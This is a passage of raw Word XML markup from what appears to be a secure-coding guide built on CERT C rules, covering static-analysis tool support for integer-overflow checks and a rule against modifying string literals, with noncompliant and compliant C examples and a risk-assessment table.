            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0216068C" w14:textId="581365E8" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">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8C066B" w14:paraId="300BC336" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8CDDEE" w14:textId="4EEF457B" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:hyperlink r:id="rId18" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A2ABA7F" w14:textId="37D93A60" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>20.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4441551B" w14:textId="7C028EEB" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>integer-overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196AC4C7" w14:textId="57F2E35A" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Fully checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C066B" w14:paraId="5FE44A56" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E4CBBF1" w14:textId="18BEF293" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:hyperlink r:id="rId19" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Axivion</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70D2F7C5" w14:textId="138AF714" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68783DFF" w14:textId="7C2D75CC" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>CertC-INT30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67EF3C2C" w14:textId="4BD2F400" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C066B" w14:paraId="142FCAB9" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5404A3BA" w14:textId="4AE77FA6" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:hyperlink r:id="rId20" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5109F248" w14:textId="0B9DBDF8" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A09A96" w14:textId="7AB53218" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>CERT_C-INT30-a</w:t>
            </w:r>
            <w:r w:rsidRPr="008C066B">
              <w:br/>
              <w:t>CERT_C-INT30-b</w:t>
            </w:r>
            <w:r w:rsidRPr="008C066B">
              <w:br/>
              <w:t>CERT_C-INT30-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D572B94" w14:textId="52185383" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Avoid integer overflows</w:t>
            </w:r>
            <w:r w:rsidRPr="008C066B">
              <w:br/>
              <w:t>Integer overflow or underflow in constant expression in '+', '-', '*' operator</w:t>
            </w:r>
            <w:r w:rsidRPr="008C066B">
              <w:br/>
              <w:t>Integer overflow or underflow in constant expression in '&lt;&lt;' operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C066B" w14:paraId="7B57D6C5" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0880DBB9" w14:textId="23211E61" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:hyperlink r:id="rId21" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="527A0ABE" w14:textId="6D40486E" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>R2021a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EFB0041" w14:textId="46147C25" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:hyperlink r:id="rId22" w:history="1">
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C: Rule INT30-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="561AC0AE" w14:textId="77777777" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B5EB584" w14:textId="77777777" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Unsigned integer overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B666EC8" w14:textId="77777777" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Unsigned integer constant overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E45804C" w14:textId="03B4C2BB" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r w:rsidRPr="008C066B">
              <w:t>Rule partially covered.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6E04C6" w:rsidR="00381847" w:rsidRDefault="00A27109">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Do not attempt to modify string literals</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CD9C45E" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00A27109">
              <w:t>STR</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00A27109">
              <w:t>030</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00A27109">
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E7240A9" w14:textId="319C930A" w:rsidR="00381847" w:rsidRDefault="00A27109">
            <w:r>
              <w:t>String literals are typically stored in read-only memory, and therefore editing this leads to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1EA7ED2" w:rsidR="00F72634" w:rsidRDefault="00865183" w:rsidP="0015146B">
            <w:r>
              <w:t>The char pointer str, is initialized to the address of a string literal. Attempting to modify the string literal is undefined behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="6EF6786D" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A5E9921"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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*str  = "string literal</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="12374FA0" w14:textId="51FE705E" w:rsidR="00F72634" w:rsidRDefault="00A27109" w:rsidP="00A27109">
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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21E5798" w:rsidR="00F72634" w:rsidRDefault="00865183" w:rsidP="0015146B">
            <w:r>
              <w:t>In the compliant code, initializing this way, the string literal also defines the size of the array. This allows us to safely modify the char array str.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="1A9D16B4" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00A46731"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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>str[] = "string literal</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5286DB6F" w14:textId="25D38B73" w:rsidR="00F72634" w:rsidRDefault="00A27109" w:rsidP="00A27109">
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>str[0]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430C6626" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Adopt a Secure Coding Standard</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – By using secure coding standards, you will avoid modifying string literals. Standards will include rules </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>similar to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> STR-030.</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1A3C43" w14:paraId="404C4507" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0264479C" w14:textId="5C286DCE" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1BDC13" w14:textId="7DBA7516" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D6ABC8" w14:textId="05B2CD0E" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D88F132" w14:textId="0D4790DA" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1999E754" w14:textId="6BCD6EDB" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">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A3C43" w14:paraId="73DAB152" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F0D11B" w14:textId="11FEB8E0" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6692C9F4" w14:textId="52FE456E" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285A8AFB" w14:textId="3036F36B" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>157 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349283E5" w14:textId="74C71EEE" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="21077E8E" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D17B6B" w14:textId="44CC86B3" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId24"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2A788F9D" w14:textId="59EAA516" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E2A4868" w14:textId="475526E0" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>CERT_C-STR30-a</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>CERT_C-STR30-b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6728BDD5" w14:textId="190FF565" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>A string literal shall not be modified</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>Do not modify string literals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="2F58D832" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378ECFD3" w14:textId="5828499A" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>PC-lint Plus</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC79B01" w14:textId="37C727E2" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10926EE6" w14:textId="562B8CD8" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>489, 1776</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB53902" w14:textId="7362EC5E" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Partially supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="4771F374" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6AC12A" w14:textId="2E0B5938" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId26" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
